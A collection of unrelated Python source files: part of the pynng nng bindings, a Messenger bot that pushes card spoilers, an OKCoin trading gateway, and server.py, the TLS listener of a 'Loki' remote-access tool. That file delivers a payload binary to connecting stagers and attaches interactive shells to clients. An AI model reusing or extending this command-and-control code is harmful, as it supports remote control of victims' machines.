:class:`Listener` is returned whenever :meth:`Socket.listen` is called. A
list of active listeners can be accessed via ``Socket.listeners``.
A :class:`Listener` is associated with a single :class:`Socket`. The
associated socket can be accessed via the ``socket`` attribute. There is
no public constructor for creating a :class:`Listener`.
"""
local_address = SockAddrOption('local-address')
remote_address = SockAddrOption('remote-address')
reconnect_time_min = MsOption('reconnect-time-min')
reconnect_time_max = MsOption('reconnect-time-max')
recv_max_size = SizeOption('recv-size-max')
url = StringOption('url')
peer = IntOption('peer')
peer_name = StringOption('peer-name')
tcp_nodelay = BooleanOption('tcp-nodelay')
tcp_keepalive = BooleanOption('tcp-keepalive')
tls_config = PointerOption('tls-config')
tls_ca_file = StringOption('tls-ca-file')
tls_cert_key_file = StringOption('tls-cert-key-file')
tls_auth_mode = IntOption('tls-authmode')
tls_server_name = StringOption('tls-server-name')
def __init__(self, listener, socket):
"""
Args:
            listener: the initialized ``lib.nng_listener``.
            socket: The Socket associated with the listener.
"""
# I can't think of a reason you would need to directly instantiate this
# class
self._listener = listener
self.socket = socket
@property
def listener(self):
return self._listener[0]
def close(self):
"""
Close the listener.
"""
lib.nng_listener_close(self.listener)
del self.socket._listeners[self.id]
@property
def id(self):
return lib.nng_listener_id(self.listener)
class Context:
"""
This is the Python version of `nng_context
<https://nanomsg.github.io/nng/man/tip/nng_ctx.5.html>`_. The way to
create a :class:`Context` is by calling :meth:`Socket.new_context()`.
Contexts are valid for :class:`Req0` and :class:`Rep0` sockets; other
protocols do not support contexts.
Once you have a context, you just call :meth:`~Context.send` and
:meth:`~Context.recv` or the async equivalents as you would on a socket.
A "context" keeps track of a protocol's state for stateful protocols (like
REQ/REP). A context allows the same :class:`Socket` to be used for
multiple operations at the same time. For an example of the problem that
contexts are solving, see this snippet, **which does not use contexts**,
and does terrible things:
.. code-block:: python
# start a socket to service requests.
# HEY THIS IS EXAMPLE BAD CODE, SO DON'T TRY TO USE IT
# in fact it's so bad it causes a panic in nng right now (2019/02/09):
# see https://github.com/nanomsg/nng/issues/871
import pynng
import threading
def service_reqs(s):
while True:
data = s.recv()
s.send(b"I've got your response right here, pal!")
threads = []
with pynng.Rep0(listen='tcp://127.0.0.1:12345') as s:
for _ in range(10):
t = threading.Thread(target=service_reqs, args=[s], daemon=True)
t.start()
threads.append(t)
for thread in threads:
thread.join()
Contexts allow multiplexing a socket in a way that is safe. It removes one
of the biggest use cases for needing to use raw sockets.
Contexts cannot be instantiated directly; instead, create a
:class:`Socket`, and call the :meth:`~Socket.new_context` method.
"""
def __init__(self, socket):
# need to set attributes first, so that if anything goes wrong,
# __del__() doesn't throw an AttributeError
self._context = None
assert isinstance(socket, Socket)
self._socket = socket
self._context = ffi.new('nng_ctx *')
check_err(lib.nng_ctx_open(self._context, socket.socket))
assert lib.nng_ctx_id(self.context) != -1
async def arecv(self):
"""Asynchronously receive data using this context."""
with _aio.AIOHelper(self, self._socket._async_backend) as aio:
return await aio.arecv()
async def asend(self, data):
"""Asynchronously send data using this context."""
_ensure_can_send(data)
with _aio.AIOHelper(self, self._socket._async_backend) as aio:
return await aio.asend(data)
def recv_msg(self):
"""Synchronously receive a :class:`Message` using this context."""
aio_p = ffi.new('nng_aio **')
check_err(lib.nng_aio_alloc(aio_p, ffi.NULL, ffi.NULL))
aio = aio_p[0]
try:
check_err(lib.nng_ctx_recv(self.context, aio))
check_err(lib.nng_aio_wait(aio))
check_err(lib.nng_aio_result(aio))
nng_msg = lib.nng_aio_get_msg(aio)
msg = Message(nng_msg)
self._socket._try_associate_msg_with_pipe(msg)
finally:
lib.nng_aio_free(aio)
return msg
def recv(self):
"""Synchronously receive data on this context."""
msg = self.recv_msg()
return msg.bytes
def send_msg(self, msg):
"""Synchronously send the :class:`Message` ``msg`` on the context."""
with msg._mem_freed_lock:
msg._ensure_can_send()
aio_p = ffi.new('nng_aio **')
check_err(lib.nng_aio_alloc(aio_p, ffi.NULL, ffi.NULL))
aio = aio_p[0]
try:
check_err(lib.nng_aio_set_msg(aio, msg._nng_msg))
check_err(lib.nng_ctx_send(self.context, aio))
msg._mem_freed = True
check_err(lib.nng_aio_wait(aio))
check_err(lib.nng_aio_result(aio))
finally:
lib.nng_aio_free(aio)
def send(self, data):
"""
Synchronously send data on the context.
"""
_ensure_can_send(data)
msg = Message(data)
return self.send_msg(msg)
def close(self):
"""Close this context."""
ctx_err = 0
if self._context is not None:
# check that nng still has a reference
if lib.nng_ctx_id(self.context) != -1:
ctx_err = lib.nng_ctx_close(self.context)
self._context = None
check_err(ctx_err)
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.close()
@property
def context(self):
"""Return the underlying nng object."""
return self._context[0]
def __del__(self):
self.close()
async def asend_msg(self, msg):
"""
Asynchronously send the :class:`Message` ``msg`` on the context.
"""
with msg._mem_freed_lock:
msg._ensure_can_send()
with _aio.AIOHelper(self, self._socket._async_backend) as aio:
# Note: the aio helper sets the _mem_freed flag on the msg
return await aio.asend_msg(msg)
async def arecv_msg(self):
"""
Asynchronously receive a :class:`Message` on the context.
"""
with _aio.AIOHelper(self, self._socket._async_backend) as aio:
msg = await aio.arecv_msg()
self._socket._try_associate_msg_with_pipe(msg)
return msg
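
# Minimal usage sketch of a context-based round trip, the safe counterpart to
# the shared-socket example warned about in the Context docstring above.  In a
# real server each worker thread would own its own context from new_context();
# the tcp address and port are arbitrary placeholders chosen for illustration.
def _example_rep_context_roundtrip():
    import pynng

    addr = 'tcp://127.0.0.1:13137'  # arbitrary local address for this sketch
    with pynng.Rep0(listen=addr) as rep, pynng.Req0(dial=addr) as req:
        with rep.new_context() as ctx:  # per-request state lives on the context
            req.send(b'ping')
            print(ctx.recv())           # b'ping'
            ctx.send(b'pong')
            print(req.recv())           # b'pong'
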
def _do_callbacks(pipe, callbacks):
for cb in callbacks:
try:
cb(pipe)
except Exception:
msg = 'Exception raised in pre pipe connect callback {!r}'
logger.exception(msg.format(cb))
@ffi.def_extern()
def _nng_pipe_cb(lib_pipe, event, arg):
logger.debug("Pipe callback event {}".format(event))
# Get the Socket from the handle passed through the callback arguments
sock = ffi.from_handle(arg)
# exceptions don't propagate out of this function, so if any exception is
# raised in any of the callbacks, we just log it (using logger.exception).
with sock._pipe_notify_lock:
pipe_id = lib.nng_pipe_id(lib_pipe)
if event == lib.NNG_PIPE_EV_ADD_PRE:
# time to do our bookkeeping; actually create the pipe and attach it to
# the socket
pipe = sock._add_pipe(lib_pipe)
_do_callbacks(pipe, sock._on_pre_pipe_add)
if pipe.closed:
# NB: we need to remove the pipe from socket now, before a remote
# tries connecting again and the same pipe ID may be reused. This
# will result in a KeyError below.
sock._remove_pipe(lib_pipe)
elif event == lib.NNG_PIPE_EV_ADD_POST:
# The ADD_POST event can arrive before ADD_PRE, in which case the Socket
# won't have the pipe_id in the _pipes dictionary
# _add_pipe will return an existing pipe or create a new one if it doesn't exist
pipe = sock._add_pipe(lib_pipe)
_do_callbacks(pipe, sock._on_post_pipe_add)
elif event == lib.NNG_PIPE_EV_REM_POST:
try:
pipe = sock._pipes[pipe_id]
except KeyError:
# we get here if the pipe was closed in pre_connect earlier. This
# is not a big deal.
logger.debug('Could not find pipe for socket')
return
try:
_do_callbacks(pipe, sock._on_post_pipe_remove)
finally:
sock._remove_pipe(lib_pipe)
class Pipe:
"""
A "pipe" is a single connection between two endpoints. This is the Python
version of `nng_pipe
<https://nanomsg.github.io/nng/man/v1.1.0/nng_pipe.5>`_.
There is no public constructor for a Pipe; they are automatically added to
the underlying socket whenever the pipe is created.
"""
local_address = SockAddrOption('local-address')
remote_address = SockAddrOption('remote-address')
url = StringOption('url')
protocol = IntOption('protocol')
protocol_name = StringOption('protocol-name')
peer = IntOption('peer')
peer_name = StringOption('peer-name')
tcp_nodelay = BooleanOption('tcp-nodelay')
tcp_keepalive = BooleanOption('tcp-keepalive')
def __init__(self, lib_pipe, socket):
# Ohhhhkay
# so
# this is weird, I know
# okay
# so
# For some reason, I'm not sure why, if we keep a reference to lib_pipe
# directly, we end up with memory corruption issues. Maybe it's a
# weird interaction between getting called in a callback and refcount
# or something, I dunno. Anyway, we need to make a copy of the
# lib_pipe object.
self._pipe = ffi.new('nng_pipe *')
self._pipe[0] = lib_pipe
self.pipe = self._pipe[0]
self.socket = socket
self._closed = False
@property
def closed(self):
"""
Return whether the pipe has been closed directly.
This will not be valid if the pipe was closed indirectly, e.g. by
closing the associated listener/dialer/socket.
"""
return self._closed
@property
def id(self):
return lib.nng_pipe_id(self.pipe)
@property
def dialer(self):
"""
Return the dialer this pipe is associated with. If the pipe is not
associated with a dialer, raise an exception
"""
dialer = lib.nng_pipe_dialer(self.pipe)
d_id = lib.nng_dialer_id(dialer)
if d_id < 0:
raise TypeError('This pipe has no associated dialers.')
return self.socket._dialers[d_id]
@property
def listener(self):
"""
Return the listener this pipe is associated with. If the pipe is not
associated with a listener, raise an exception
"""
listener = lib.nng_pipe_listener(self.pipe)
l_id = lib.nng_listener_id(listener)
if l_id < 0:
raise TypeError('This pipe has no associated listeners.')
return self.socket._listeners[l_id]
def close(self):
"""
Close the pipe.
"""
check_err(lib.nng_pipe_close(self.pipe))
self._closed = True
def send(self, data):
"""
Synchronously send bytes from this :class:`Pipe`. This method
automatically creates a :class:`Message`, associates with this pipe,
and sends it with this pipe's associated :class:`Socket`.
"""
_ensure_can_send(data)
msg = Message(data, self)
self.socket.send_msg(msg)
def send_msg(self, msg):
"""
Synchronously send a Message from this :class:`Pipe`.
"""
msg.pipe = self
self.socket.send_msg(msg)
async def asend(self, data):
"""
Asynchronously send bytes from this :class:`Pipe`.
"""
_ensure_can_send(data)
msg = Message(data, self)
return await self.socket.asend_msg(msg)
async def asend_msg(self, msg):
"""
Asynchronously send a Message from this :class:`Pipe`.
"""
msg.pipe = self
return await self.socket.asend_msg(msg)
class Message:
"""
Python interface for `nng_msg
<https://nanomsg.github.io/nng/man/tip/nng_msg.5.html>`_. Using the
:class:`Message` interface gives more control over aspects of
sending the message. In particular, you can tell which
:class:`Pipe` a message came from on receive, and you can direct
which :class:`Pipe` a message will be sent from on send.
In normal usage, you would not create a :class:`Message` directly. Instead
you would receive a message using :meth:`Socket.recv_msg`, and send a
message (implicitly) by using :meth:`Pipe.send`.
Since the main purpose of creating a :class:`Message` is to send it using a
specific :class:`Pipe`, it is usually more convenient to just use the
:meth:`Pipe.send` or :meth:`Pipe.asend` method directly.
Messages in pynng are immutable; this is to prevent data corruption.
Warning:
        The message's underlying data buffer can be accessed with the
        ``_buffer`` attribute.  However, care must be taken not to send a message
while a reference to the buffer is still alive; if the buffer is used after
a message is sent, a segfault or data corruption may (read: will)
result.
"""
def __init__(self, data, pipe=None):
# NB! There are two ways that a user can free resources that an nng_msg
# is using: either sending with nng_sendmsg (or the async equivalent)
# or with nng_msg_free. We don't know how this msg will be used, but
# we need to **ensure** that we don't try to double free. The flag
# _mem_freed is used to indicate that we cannot send the message again.
# The methods send_msg() and asend_msg() must ensure that the flag
# `_mem_freed` is set to True.
self._mem_freed = False
self._mem_freed_lock = threading.Lock()
if isinstance(data, ffi.CData) and \
ffi.typeof(data).cname == 'struct nng_msg *':
self._nng_msg = data
else:
msg_p = ffi.new('nng_msg **')
check_err(lib.nng_msg_alloc(msg_p, 0))
msg = msg_p[0]
check_err(lib.nng_msg_append(msg, data, len(data)))
self._nng_msg = msg
# We may not have been given a pipe, in which case the pipe is None.
if pipe is None:
self._pipe = None
else:
self.pipe = pipe
@property
def pipe(self):
return self._pipe
@pipe.setter
def pipe(self, pipe):
if not isinstance(pipe, Pipe):
msg = 'pipe must be type Pipe, not {}'.format(type(pipe))
raise ValueError(msg)
check_err(lib.nng_msg_set_pipe(self._nng_msg, pipe.pipe))
self._pipe = pipe
@property
def _buffer(self):
"""
Returns a cffi.buffer to the underlying nng_msg buffer.
If you access the message's buffer using this property, you must ensure
that you do not send the message until you are not using the buffer
anymore.
"""
with self._mem_freed_lock:
if not self._mem_freed:
size = lib.nng_msg_len(self._nng_msg)
data = ffi.cast('char *', lib.nng_msg_body(self._nng_msg))
return ffi.buffer(data[0:size])
@property
def bytes(self):
"""
Return the bytes from the underlying buffer.
"""
return bytes(self._buffer)
def __del__(self):
with self._mem_freed_lock:
if self._mem_freed:
return
else:
lib.nng_msg_free(self._nng_msg)
# pretty sure it's not necessary to set this, but that's okay.
self._mem_freed = True
def _ensure_can_send(self):
"""
Raises an exception if the message's state is such that it cannot be
        sent.  The ``_mem_freed_lock`` must be held when this method is
        called.
"""
assert self._mem_freed_lock.locked()
if self._mem_freed:
msg = 'Attempted to send the same message more than once.'
raise pynng.MessageStateError(msg)
|
webhook.py
|
from bottle import route, run, request, response, default_app
import json
import msbot.constants
import msbot.mslib
import msbot.msdb
import requests
import time
import msbot.settings
import sqlite3
from threading import Thread
db_file = msbot.settings.DB_LOCATION
# Helpers
def send_message(sender_psid, response):
request_body = {
msbot.constants.RECIPIENT: {
msbot.constants.ID: sender_psid
},
msbot.constants.MESSAGE: response,
}
print('sending image')
print(str(request_body))
params = {
msbot.constants.ACCESS_TOKEN: msbot.settings.PAGE_ACCESS_TOKEN,
msbot.constants.RECIPIENT: sender_psid
}
r = requests.post(msbot.constants.FB_MESSAGE_URL, params=params, json=request_body)
def to_text_response(text):
return { msbot.constants.TEXT: text }
def create_quick_reply_button(payload):
return {
msbot.constants.CONTENT_TYPE: msbot.constants.TEXT,
msbot.constants.TITLE: payload.capitalize(),
msbot.constants.PAYLOAD: payload,
}
def text_quick_reply_response(text, buttons):
return {
msbot.constants.TEXT: text,
msbot.constants.QUICK_REPLIES: buttons
}
def is_spoiler_allowed_by_options(spoiler, options):
return (
(
options.duplicates or
(not options.duplicates and not any(c.isdigit() for c in spoiler.image_url))
)
)
def filter_spoilers_by_user(spoilers, user):
return [ s for s in spoilers if is_spoiler_allowed_by_options(s, user.options) ]
def get_spoilers_for_user(user):
db = msbot.msdb.MSDatabase(db_file)
spoilers = db.get_spoilers_later_than(user.last_spoiled)
return filter_spoilers_by_user(spoilers, user)
# TODO: Refactor this to take in a user object and a last spoiled id
# Also write a test for it
UPDATE_BUTTONS = [
create_quick_reply_button(msbot.constants.SEND_CMD),
create_quick_reply_button(msbot.constants.RECENT_CMD),
]
def send_update(sender_psid, text):
send_message(
sender_psid,
text_quick_reply_response(text, UPDATE_BUTTONS)
)
def get_attach_id_for(image_url):
print('Getting attach id for ', image_url)
body = {
"message": {
"attachment": {
"type": "image",
"payload": {
"is_reusable": True,
"url": image_url
}
}
}
}
try:
attach_response = requests.post(msbot.constants.FB_API_URL, json=body)
    except requests.exceptions.ConnectionError:
print('FB Connection Error')
else:
return json.loads(attach_response.text)['attachment_id']
def send_spoiler_to(user, spoiler):
db = msbot.msdb.MSDatabase(db_file)
response = {
"attachment": {
"type": "image",
"payload": {
"attachment_id": spoiler.attach_id
}
}
}
send_message(user.user_id, response)
def update_spoilers():
db = msbot.msdb.MSDatabase(db_file)
spoilers = [
s for s in msbot.mslib.getLatestSpoilers() if not
db.spoiler_exists(s)
]
attach_dict = { s: get_attach_id_for(s) for s in spoilers }
for spoiler, attach_id in attach_dict.items():
db.add_spoiler(spoiler, attach_id)
def update_user(user):
db = msbot.msdb.MSDatabase(db_file)
last_spoiler = db.get_latest_spoiler_id()
spoilers = get_spoilers_for_user(user)
def poll(user):
if spoilers:
resp = msbot.constants.RESP_UPDATE.format(num_spoilers=len(spoilers))
send_update(user.user_id, resp)
db.update_user(user.user_id, last_updated=last_spoiler)
def asap(user):
for spoiler in spoilers:
send_spoiler_to(user, spoiler)
db.update_user(
user.user_id,
last_updated=last_spoiler,
last_spoiled=last_spoiler,
)
update_modes = {
msbot.constants.POLL_MODE_CMD: lambda user: poll(user),
msbot.constants.ASAP_MODE_CMD: lambda user: asap(user),
}
user_mode = user.options.update_mode
if user_mode in update_modes:
update_modes[user_mode](user)
else:
poll(user)
def update_users():
db = msbot.msdb.MSDatabase(db_file)
unnotified_users = db.get_all_unnotified_users()
for user in unnotified_users:
if db.get_user_from_id(user.user_id).last_updated < db.get_latest_spoiler_id():
update_user(user)
#send updates from MythicSpoiler every 10 minutes
def update():
while True:
time.sleep(600)
update_spoilers()
update_users()
#Handle messages received from user
INFO_BUTTON = create_quick_reply_button(msbot.constants.INFO_CMD)
HELLO_BUTTON = create_quick_reply_button(msbot.constants.HELLO_CMD)
RECENT_BUTTON = create_quick_reply_button(msbot.constants.RECENT_CMD)
MODE_BUTTON = create_quick_reply_button(msbot.constants.MODE_CMD)
OPTIONS_BUTTON = create_quick_reply_button(msbot.constants.OPTIONS_CMD)
UPDATE_MODE_BUTTONS = [
create_quick_reply_button(msbot.constants.POLL_MODE_CMD),
create_quick_reply_button(msbot.constants.ASAP_MODE_CMD),
]
INFO_PROMPT_BUTTONS = [
create_quick_reply_button(msbot.constants.SEND_CMD),
RECENT_BUTTON,
OPTIONS_BUTTON,
create_quick_reply_button(msbot.constants.GOODBYE_CMD),
]
OPTIONS_PROMPT_BUTTONS = [
MODE_BUTTON,
create_quick_reply_button(msbot.constants.DUPLICATES_CMD),
]
RESP_INVALID_CMD = text_quick_reply_response(
msbot.constants.RESP_INVALID_UNSUBBED,
[ HELLO_BUTTON ]
)
def handle_message(sender_psid, received_message):
database = msbot.msdb.MSDatabase(db_file)
def subscribe(sender_psid):
if database.user_exists(sender_psid):
return to_text_response(msbot.constants.RESP_ALREADY_SUBBED)
database.add_user(sender_psid)
return text_quick_reply_response(
msbot.constants.RESP_SUBBED,
[ INFO_BUTTON ]
)
def unsubscribe(sender_psid):
if database.user_exists(sender_psid):
database.delete_user(sender_psid)
return msbot.constants.RESP_UNSUBBED
return msbot.constants.RESP_ALREADY_UNSUBBED
def send(sender_psid):
if database.user_exists(sender_psid):
user = database.get_user_from_id(sender_psid)
last_spoiler = database.get_latest_spoiler_id()
spoilers = get_spoilers_for_user(user)
if not spoilers:
return text_quick_reply_response(
msbot.constants.RESP_UPDATE_UPDATED,
[ RECENT_BUTTON ]
)
for spoiler in spoilers:
send_spoiler_to(user, spoiler)
database.update_user(
user.user_id,
last_updated=last_spoiler,
last_spoiled=last_spoiler
)
return to_text_response(msbot.constants.RESP_UPDATE_COMPLETE)
return RESP_INVALID_CMD
def recent(sender_psid):
if database.user_exists(sender_psid):
user = database.get_user_from_id(sender_psid)
last_spoiler = database.get_latest_spoiler_id()
last_spoil_date = database.get_latest_spoiler_date()
spoilers = database.get_all_spoilers_on_date(last_spoil_date)
for spoiler in spoilers:
send_spoiler_to(user, spoiler)
database.update_user(
user.user_id,
last_updated=last_spoiler,
last_spoiled=last_spoiler
)
return to_text_response(
msbot.constants.RESP_LAST_SPOILER_INFO.format(
date_string=last_spoil_date
)
)
return RESP_INVALID_CMD
def mode(sender_psid):
if database.user_exists(sender_psid):
user = database.get_user_from_id(sender_psid)
text = msbot.constants.RESP_MODE_PROMPT.format(
update_mode=user.options.update_mode
)
return text_quick_reply_response(text, UPDATE_MODE_BUTTONS)
return RESP_INVALID_CMD
def change_update_mode(sender_psid, mode):
if database.user_exists(sender_psid):
database.update_user(
sender_psid,
options={
msbot.constants.UPDATE_MODE: mode
}
)
return to_text_response(
msbot.constants.RESP_MODE_COMPLETE.format(update_mode=mode)
)
return RESP_INVALID_CMD
def toggle_duplicates(sender_psid):
if database.user_exists(sender_psid):
user = database.get_user_from_id(sender_psid)
database.update_user(
sender_psid,
options={
msbot.constants.DUPLICATES: not user.options.duplicates
}
)
return to_text_response(
msbot.constants.RESP_DUPLICATE_TOGGLE_COMPLETE.format(
duplicate_status=(
msbot.constants.ON
if not user.options.duplicates
else msbot.constants.OFF
)
)
)
return RESP_INVALID_CMD
def options(sender_psid):
if database.user_exists(sender_psid):
user = database.get_user_from_id(sender_psid)
return text_quick_reply_response(
msbot.constants.RESP_OPTIONS_PROMPT.format(
duplicate_status = (
msbot.constants.ON if user.options.duplicates
else msbot.constants.OFF
),
update_mode = user.options.update_mode
),
OPTIONS_PROMPT_BUTTONS
)
return RESP_INVALID_CMD
def info(sender_psid):
if database.user_exists(sender_psid):
return text_quick_reply_response(
msbot.constants.RESP_INFO_PROMPT,
INFO_PROMPT_BUTTONS
)
return RESP_INVALID_CMD
responses = {
msbot.constants.HELLO_CMD: lambda id: subscribe(id),
msbot.constants.GOODBYE_CMD: lambda id: to_text_response(unsubscribe(id)),
msbot.constants.SEND_CMD: lambda id: send(id),
msbot.constants.RECENT_CMD: lambda id: recent(id),
msbot.constants.MODE_CMD: lambda id: mode(id),
msbot.constants.POLL_MODE_CMD: lambda id: change_update_mode(
id,
msbot.constants.POLL_MODE_CMD
),
msbot.constants.ASAP_MODE_CMD: lambda id: change_update_mode(
id,
msbot.constants.ASAP_MODE_CMD
),
msbot.constants.DUPLICATES_CMD: lambda id: toggle_duplicates(id),
msbot.constants.OPTIONS_CMD: lambda id: options(id),
msbot.constants.INFO_CMD: lambda id: info(id),
}
message = received_message.lower()
if message in responses:
resp = responses[message](sender_psid)
else:
resp = RESP_INVALID_CMD
if database.user_exists(sender_psid):
resp = text_quick_reply_response(
msbot.constants.RESP_INVALID_SUBBED,
[ INFO_BUTTON ]
)
send_message(sender_psid, resp)
def handle_postback(sender_psid, received_postback):
pass
def is_allowed_psid(sender_psid):
return (
not msbot.settings.DEV_MODE or
(msbot.settings.DEV_MODE and sender_psid in msbot.settings.DEV_SAFELIST)
)
@route('/webhook', method='POST')
def webhook_event():
print('event received')
req = json.loads(request.body.getvalue().decode('utf-8'))
if req[msbot.constants.OBJECT] == msbot.constants.PAGE_OBJECT:
for entry in req[msbot.constants.ENTRY]:
event = entry[msbot.constants.MESSAGING][0]
sender_psid = event[msbot.constants.SENDER][msbot.constants.ID]
print("GOT MESSAGE FROM ", sender_psid)
            if msbot.constants.MESSAGE in event:
try:
if is_allowed_psid(sender_psid):
handle_thread = Thread(
target = handle_message, args=(
sender_psid,
event[msbot.constants.MESSAGE][msbot.constants.TEXT]
)
)
                        handle_thread.daemon = True
handle_thread.start()
except KeyError:
print('Non-text message received')
            elif msbot.constants.POSTBACK in event:
handle_postback(sender_psid, event[msbot.constants.POSTBACK])
response.status = 200
return 'EVENT_RECEIVED'
else:
response.status = 404
@route('/webhook', method='GET')
def webhook_verify():
mode = request.query[msbot.constants.MODE]
token = request.query[msbot.constants.TOKEN]
challenge = request.query[msbot.constants.CHALLENGE]
if mode and token:
if mode == msbot.constants.SUBSCRIBE and token == msbot.settings.VERIFY_TOKEN:
print('WEBHOOK_VERIFIED')
response.status = 200
return challenge
else:
response.status = 403
if __name__ == '__main__':
run(host='0.0.0.0', port=8080)
else:
app = application = default_app()
update_thread = Thread(target = update)
    update_thread.daemon = True
update_thread.start()
|
server.py
|
# Date: 06/01/2018
# Author: Pure-L0G1C
# Description: Server
import ssl
import socket
from os import path
from lib import const
from time import sleep
from queue import Queue
from OpenSSL import crypto
from random import SystemRandom
from threading import Thread, RLock
from . lib import session, shell, interface
class Server(object):
def __init__(self):
self.interface = interface.Interface()
self.waiting_conn = Queue()
self.is_active = False # is the server active
self.lock = RLock()
self.server = None
self.port = None
self.ip = None
self.is_processing = False
def gen_cert(self):
key_pair = crypto.PKey()
key_pair.generate_key(crypto.TYPE_RSA, 2048)
cert = crypto.X509()
cert.get_subject().O = 'Loki'
cert.get_subject().CN = 'Sami'
cert.get_subject().OU = 'Pure-L0G1C'
cert.get_subject().C = 'US'
cert.get_subject().L = 'Los Santos'
cert.get_subject().ST = 'California'
cert.set_serial_number(SystemRandom().randint(2048 ** 8, 4096 ** 8))
cert.gmtime_adj_notBefore(0)
cert.gmtime_adj_notAfter(256 * 409600)
cert.set_issuer(cert.get_subject())
cert.set_pubkey(key_pair)
cert.sign(key_pair, 'sha256')
with open(const.CERT_FILE, 'wb') as f:
f.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
with open(const.KEY_FILE, 'wb') as f:
f.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, key_pair))
def server_start(self):
if self.is_processing:
return
self.is_processing = True
self.gen_cert()
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain(const.CERT_FILE, const.KEY_FILE)
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
sock.bind((self.ip, self.port))
self.is_active = True
sock.settimeout(0.5)
sock.listen(100)
self.server = context.wrap_socket(sock, server_side=True)
self.services_start()
except OSError:
self.display_text('Error: invalid IP')
self.port = None
self.ip = None
finally:
self.is_processing = False
def server_stop(self):
if self.is_processing:
return
self.is_processing = True
if not self.is_active:
self.is_processing = False
return
self.is_active = False
self.interface.close()
self.is_processing = False
self.ip, self.port = None, None
def manage_conn_info(self, sess_obj, conn_info):
if conn_info:
try:
with self.lock:
services = {
'ssh': {
'ip': const.PUBLIC_IP,
'port': const.SSH_PORT
}, 'ftp': {
'ip': const.PUBLIC_IP,
'port': const.FTP_PORT
}
}
sess_obj.send(args=services)
self.manage_conn(sess_obj, conn_info)
except:
pass
def manage_conn(self, sess_obj, conn_info):
_shell = shell.Shell(sess_obj, self.interface)
shell_thread = Thread(target=_shell.start)
self.interface.connect_client(sess_obj, conn_info, _shell)
shell_thread.daemon = True
shell_thread.start()
def send_payload(self, sess):
'''Send payload to stager
'''
if not path.exists(const.PAYLOAD_PATH):
print('Payload binary does not exist; please generate it')
return
with open(const.PAYLOAD_PATH, 'rb') as f:
while True:
data = f.read(const.BLOCK_SIZE)
if data:
sess.sendall(data)
else:
break
def examine_conn(self, s, conn_info):
        if not isinstance(conn_info, dict):
print('Client did not supply a proper data type')
return
        if 'code' not in conn_info or 'args' not in conn_info:
print('Client did not supply both code and args')
return
        if conn_info['code'] is None:
print('Client supplied no code')
return
if conn_info['code'] == const.STAGER_CODE:
self.send_payload(s.session)
return
if conn_info['code'] == const.CONN_CODE:
print('Establishing a secure connection ...')
self.manage_conn_info(s, conn_info)
def establish_conn(self, sess, ip):
s = session.Session(sess, ip)
conn_info = s.initial_communication()
if conn_info:
self.examine_conn(s, conn_info)
def waiting_conn_manager(self):
while self.is_active:
if self.waiting_conn.qsize():
session, ip = self.waiting_conn.get()
sleep(0.5)
self.establish_conn(session, ip)
def server_loop(self):
while self.is_active:
try:
session, ip = self.server.accept()
self.waiting_conn.put([session, ip])
except:
pass
def services_start(self):
server_loop = Thread(target=self.server_loop)
conn_manager = Thread(target=self.waiting_conn_manager)
server_loop.daemon = True
conn_manager.daemon = True
server_loop.start()
conn_manager.start()
print('Server started successfully')
# -------- UI -------- #
def display_text(self, text):
print('{0}{1}{0}'.format('\n\n\t', text))
def start(self, ip, port):
if self.is_active:
self.server_stop()
self.ip, self.port = ip, int(port)
self.server_start()
sleep(1.2)
return self.is_active
def stop(self):
if self.is_active:
self.server_stop()
sleep(1.2)
return self.is_active
|
okcoinGateway.py
|
# encoding: UTF-8
'''
Gateway adapter for vn.okcoin.
Notes:
1. Currently only USD and CNY spot trading are supported; USD futures contract trading is not yet supported.
'''
import os
import json
from datetime import datetime
from time import sleep  # used by the reconnect loop in Api.onClose
from copy import copy
from threading import Condition
from queue import Queue
from threading import Thread
from vnpy.api.okcoin import vnokcoin
from vnpy.trader.vtGateway import *
# Price type mapping
priceTypeMap = {}
priceTypeMap['buy'] = (DIRECTION_LONG, PRICETYPE_LIMITPRICE)
priceTypeMap['buy_market'] = (DIRECTION_LONG, PRICETYPE_MARKETPRICE)
priceTypeMap['sell'] = (DIRECTION_SHORT, PRICETYPE_LIMITPRICE)
priceTypeMap['sell_market'] = (DIRECTION_SHORT, PRICETYPE_MARKETPRICE)
priceTypeMapReverse = {v: k for k, v in list(priceTypeMap.items())}
# Direction type mapping
directionMap = {}
directionMapReverse = {v: k for k, v in list(directionMap.items())}
# Order status mapping
statusMap = {}
statusMap[-1] = STATUS_CANCELLED
statusMap[0] = STATUS_NOTTRADED
statusMap[1] = STATUS_PARTTRADED
statusMap[2] = STATUS_ALLTRADED
statusMap[4] = STATUS_UNKNOWN
############################################
## Trading contract symbols
############################################
# USD
BTC_USD_SPOT = 'BTC_USD_SPOT'
BTC_USD_THISWEEK = 'BTC_USD_THISWEEK'
BTC_USD_NEXTWEEK = 'BTC_USD_NEXTWEEK'
BTC_USD_QUARTER = 'BTC_USD_QUARTER'
LTC_USD_SPOT = 'LTC_USD_SPOT'
LTC_USD_THISWEEK = 'LTC_USD_THISWEEK'
LTC_USD_NEXTWEEK = 'LTC_USD_NEXTWEEK'
LTC_USD_QUARTER = 'LTC_USD_QUARTER'
# CNY
BTC_CNY_SPOT = 'BTC_CNY_SPOT'
LTC_CNY_SPOT = 'LTC_CNY_SPOT'
# Mapping dictionaries
spotSymbolMap = {}
spotSymbolMap['ltc_usd'] = LTC_USD_SPOT
spotSymbolMap['btc_usd'] = BTC_USD_SPOT
spotSymbolMap['ltc_cny'] = LTC_CNY_SPOT
spotSymbolMap['btc_cny'] = BTC_CNY_SPOT
spotSymbolMapReverse = {v: k for k, v in list(spotSymbolMap.items())}
############################################
## Channel-to-symbol mapping
############################################
channelSymbolMap = {}
# USD
channelSymbolMap['ok_sub_spotusd_btc_ticker'] = BTC_USD_SPOT
channelSymbolMap['ok_sub_spotusd_ltc_ticker'] = LTC_USD_SPOT
channelSymbolMap['ok_sub_spotusd_btc_depth_20'] = BTC_USD_SPOT
channelSymbolMap['ok_sub_spotusd_ltc_depth_20'] = LTC_USD_SPOT
# CNY
channelSymbolMap['ok_sub_spotcny_btc_ticker'] = BTC_CNY_SPOT
channelSymbolMap['ok_sub_spotcny_ltc_ticker'] = LTC_CNY_SPOT
channelSymbolMap['ok_sub_spotcny_btc_depth_20'] = BTC_CNY_SPOT
